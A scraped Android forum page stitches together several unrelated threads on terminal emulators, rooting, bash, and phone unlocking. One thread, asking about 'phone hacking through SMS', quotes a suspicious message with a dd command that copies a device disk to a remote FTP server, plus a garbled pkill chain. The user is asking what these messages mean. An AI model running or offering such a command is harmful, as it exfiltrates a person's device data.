Finding motherboard id using Android Terminal Emulator. - General Questions and Answers

Could someone explain how to use Android Terminal Emulator to get the motherboard id for android tablet?

obalaban said:
Could someone explain how to use Android Terminal Emulator to get the motherboard id for android tablet?
Click to expand...
Click to collapse
Here you go
cat /proc/cpuinfo
cat /proc/meminfo free
cat /proc/version
Hit tnx if I helped you :good:

Related

Can be closed now.

Just curious. I tried to root a Gingerbread emulator with the new Gingerbreak method, but that didn't work.
Typed by Z using the Gingerbread keyboard.
It's rooted by default. What do you want to do?
No it's not, try su-ing in a console.
GaiusM said:
No it's not, try su-ing in a console.
Click to expand...
Click to collapse
Code:
$ adb devices
List of devices attached
emulator-5554 device
$ adb shell
# <-- '#' indicates that I'm root.
# umount /cache <-- only root can do that
# su <-- su works too
#
Do you use "adb shell" or some terminal emulator app?
yes the emulator is already rooted, but it cannot run root-required app, like root explorer.
aldee_s said:
yes the emulator is already rooted, but it cannot run root-required app, like root explorer.
Click to expand...
Click to collapse
Ok, thread can be closed now.
Typed by Z using the Gingerbread keyboard.

Add bash shell on your phone

I added bash to replace sh on my phone and i think it may be useful for someone.
I used this http://forum.xda-developers.com/showthread.php?t=537827 from mzet (Worked).
I also found this script http://forum.xda-developers.com/showthread.php?t=746364 from dsixda (NOT tried)
It is a much better shelll and it supports TAB.
It is also used when you connect your phone via ADB
terminal emulator: su (allow) ?
Nightbox said:
terminal emulator: su (allow) ?
Click to expand...
Click to collapse
yes of course
mpbm23 said:
I added bash to replace sh on my phone and i think it may be useful for someone.
I used this http://forum.xda-developers.com/showthread.php?t=537827 from mzet (Worked).
I also found this script http://forum.xda-developers.com/showthread.php?t=746364 from dsixda (NOT tried)
It is a much better shelll and it supports TAB.
It is also used when you connect your phone via ADB
Click to expand...
Click to collapse
thnx fr sharing

Unlocking Sidekick 4g

I already rooted my phone with super one click. I downloaded 010 Hex Editor from the net and terminal emulator from the market place, but once I enter the commands on terminal emulator it says "not found" can someone tell why that is? I typed cd /dev/block <enter> just like it says in the guide.
Thanks in advance!
churroinyomouf said:
I already rooted my phone with super one click. I downloaded 010 Hex Editor from the net and terminal emulator from the market place, but once I enter the commands on terminal emulator it says "not found" can someone tell why that is? I typed cd /dev/block <enter> just like it says in the guide.
Thanks in advance!
Click to expand...
Click to collapse
I have a feeling that "type su" step is missing before entering /dev/block.
Hey blagus, I shall try that. Thanks for the tip!
Sent from my SGH-T839 using xda premium

Phone hacking through SMS

I am getting a SMS that seems to be a hacking command.
Can anyone tell what this command does?
`/bin/sh ps aux | grep -i dd | grep -v ftp > pkill -f "dd" --halt -t 9 days -SIGTERM -exec [email protected] -S "bda"`~:/
On September 12, I had got an SMS from the same phone number (+1 561-935-9982) which seems to be a hacking command too:
dd if=/dev/ad0 of=ftp://silliconboy.secureftp.us bs=1M conv=noerror mode=silent
It looks like someone is trying to run a file copy command ("dd") to copy the files on my phone to a remote ftp server.
Is this really happening?
Can anyone execute UNIX commands on Android phones just by sending an SMS?
If an app is installed in your phone having root access, it can be done using shell commands. Make sure no unwanted app is installed or have root access. E.g. Cerberus app can do that.
Sent from my "1+2" powered by Unofficial RR
Compiled by myself.
boball said:
On September 12, I had got an SMS from the same phone number (+1 561-935-9982) which seems to be a hacking command too:
dd if=/dev/ad0 of=ftp://silliconboy.secureftp.us bs=1M conv=noerror mode=silent
It looks like someone is trying to run a file copy command ("dd") to copy the files on my phone to a remote ftp server.
Is this really happening?
Can anyone execute UNIX commands on Android phones just by sending an SMS?
Click to expand...
Click to collapse
it has to be an app, getting root access

A Dev that has questions

Hey guys, Render here. I would love some assistance from anyone with the new pixel 2. I am just looking for some information. All you need to do is have terminal installed (no root needed) or use adb shell. What I need if for someone to run the below command and post them here. I truly appreciate your assistance of you can help.
I need the output of these commands:
cat /proc/sys/kernel/sched_domain/cpu0/domain0/group1/energy/cap_states
cat /proc/sys/kernel/sched_domain/cpu0/domain0/group1/energy/idle_states
cat /proc/sys/kernel/sched_domain/cpu0/domain1/group1/energy/cap_states
cat /proc/sys/kernel/sched_domain/cpu0/domain1/group1/energy/idle_states
cat /proc/sys/kernel/sched_domain/cpu4/domain0/group1/energy/cap_states
cat /proc/sys/kernel/sched_domain/cpu4/domain0/group1/energy/idle_states
cat /proc/sys/kernel/sched_domain/cpu4/domain1/group1/energy/cap_states
cat /proc/sys/kernel/sched_domain/cpu4/domain1/group1/energy/idle_states
I got my information. Thanks anyways guys

Categories

Resources